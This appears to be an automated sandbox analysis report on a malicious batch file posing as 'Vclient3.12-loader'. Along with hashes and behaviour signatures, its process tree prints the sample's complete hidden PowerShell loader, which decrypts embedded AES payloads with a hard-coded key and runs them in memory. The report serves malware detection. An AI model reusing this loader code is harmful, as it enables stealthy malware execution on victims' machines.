Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04/03/2025, 03:31
Static task
static1
Behavioral task
behavioral1
Sample
Vclient3.12-loader.bat
Resource
win7-20240903-en
5 signatures
150 seconds
General
-
Target
Vclient3.12-loader.bat
-
Size
337KB
-
MD5
b0b26501fa33bc553f9a54ca28a89a85
-
SHA1
9f868d7d464375d1ea60c5234f4dd057ea85fce1
-
SHA256
f60cc29ba04d75d31227e8f0417640ed962d2cbfb537072b1b00aa89df9be473
-
SHA512
fcd9680de0ce271730f9cc5968d3172ed03e2463e53af66b19c898e7ac0e6c97717f8948d27e329f30f78ba051bb4a81acb4dc837ce602964e64470a6a0f3069
-
SSDEEP
6144:7rVhpfca9iHDDTI3nozeFFDNwPlxR+RG7PrwzZ0qw/FU1qBIEhY:dbaHDunIxoRWrOZ05U11EhY
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2328 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2328 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2328 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1732 wrote to memory of 2996 1732 cmd.exe 31 PID 1732 wrote to memory of 2996 1732 cmd.exe 31 PID 1732 wrote to memory of 2996 1732 cmd.exe 31 PID 2996 wrote to memory of 2684 2996 net.exe 32 PID 2996 wrote to memory of 2684 2996 net.exe 32 PID 2996 wrote to memory of 2684 2996 net.exe 32 PID 1732 wrote to memory of 2328 1732 cmd.exe 33 PID 1732 wrote to memory of 2328 1732 cmd.exe 33 PID 1732 wrote to memory of 2328 1732 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Vclient3.12-loader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2684
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IvmgzXjQuMVka6TfIyG1HvCr7DfXZYnR3O8Q3T8SJgE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbClhals/5qz6aDu+zXVpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aNToN=New-Object System.IO.MemoryStream(,$param_var); $rAzqO=New-Object System.IO.MemoryStream; $bDCjb=New-Object System.IO.Compression.GZipStream($aNToN, [IO.Compression.CompressionMode]::Decompress); $bDCjb.CopyTo($rAzqO); $bDCjb.Dispose(); $aNToN.Dispose(); $rAzqO.Dispose(); $rAzqO.ToArray();}function execute_function($param_var,$param2_var){ $Wdwoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fjmwH=$Wdwoi.EntryPoint; $fjmwH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Vclient3.12-loader.bat';$vmyBp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Vclient3.12-loader.bat').Split([Environment]::NewLine);foreach ($lpWSJ in $vmyBp) { if ($lpWSJ.StartsWith(':: ')) { $jqVvs=$lpWSJ.Substring(3); break; }}$payloads_var=[string[]]$jqVvs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2328
-